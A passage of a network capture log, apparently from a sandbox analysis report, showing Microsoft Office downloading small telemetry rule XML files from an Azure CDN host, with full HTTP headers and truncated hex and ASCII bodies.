                                          2024-11-18 22:44:58 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          92192.168.2.45737013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:58 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:58 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:58 GMT
                                          Content-Type: text/xml
                                          Content-Length: 472
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                          ETag: "0x8DC582B91EAD002"
                                          x-ms-request-id: 200f6d4e-701e-003e-2fb8-3779b3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224458Z-16547b76f7fp6s5dhC1DFWe28g00000003n000000000rdet
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:58 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          93192.168.2.45737213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:58 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:58 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:58 GMT
                                          Content-Type: text/xml
                                          Content-Length: 475
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                          ETag: "0x8DC582BBA740822"
                                          x-ms-request-id: 90f07e84-d01e-0028-2a09-377896000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224458Z-16547b76f7fsq6p7hC1DFWfx6800000004x000000000cq4y
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:58 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          94192.168.2.45737513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:58 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:59 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:58 GMT
                                          Content-Type: text/xml
                                          Content-Length: 419
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                          ETag: "0x8DC582BA6CF78C8"
                                          x-ms-request-id: fa98855d-501e-0064-4540-361f54000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224458Z-16547b76f7ffqpvqhC1DFWwf3n00000000zg000000008zfg
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          95192.168.2.45737413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:58 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:59 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 474
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                          ETag: "0x8DC582BA4037B0D"
                                          x-ms-request-id: 03bc4034-001e-00a2-3978-36d4d5000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224459Z-17cf5b775c4dj7lnhC1DFWmqrg00000000c0000000002p8v
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:59 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          96192.168.2.45737313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:59 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:59 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 427
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                          ETag: "0x8DC582BB464F255"
                                          x-ms-request-id: 28ec3a41-801e-00a0-70af-362196000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224459Z-16547b76f7fkz9l7hC1DFW35uc00000003dg00000000w7pd
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:59 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          97192.168.2.45737713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:59 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:59 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 405
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                          ETag: "0x8DC582B942B6AFF"
                                          x-ms-request-id: dfb03e2b-001e-00ad-2bc4-37554b000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224459Z-1866b5c5fbbnjgfwhC1DFW3usc00000001sg000000008s5n
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:59 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          98192.168.2.45737613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:59 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:59 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 472
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                          ETag: "0x8DC582B984BF177"
                                          x-ms-request-id: 4d38b348-201e-006e-4a3e-38bbe3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224459Z-164f84587bfdfkt7hC1DFW4fas00000004eg00000000gwvh
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          99192.168.2.45737913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:59 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:59 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 174
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                          ETag: "0x8DC582B91D80E15"
                                          x-ms-request-id: 67879f82-a01e-000d-0dd2-37d1ea000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224459Z-16547b76f7fd4rc5hC1DFWkzhw00000006mg000000010kag
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:59 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          100192.168.2.45737813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:59 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:59 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 468
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                          ETag: "0x8DC582BBA642BF4"
                                          x-ms-request-id: 685cc001-201e-0085-3009-3734e3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224459Z-16547b76f7fwcwmrhC1DFWtp04000000028g00000000s906
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          101192.168.2.45738013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:59 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:00 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1952
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                          ETag: "0x8DC582B956B0F3D"
                                          x-ms-request-id: 0e6654d1-b01e-0097-46c4-374f33000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224459Z-r18f44ddb69xvwv5hC1DFWstpn00000000g000000000amxa
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:00 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          102192.168.2.45738113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:59 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:00 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 958
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                          ETag: "0x8DC582BA0A31B3B"
                                          x-ms-request-id: 919dae56-201e-0096-657a-36ace6000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224500Z-164f84587bfsgfx9hC1DFWw1as00000006b000000000e2we
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:00 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
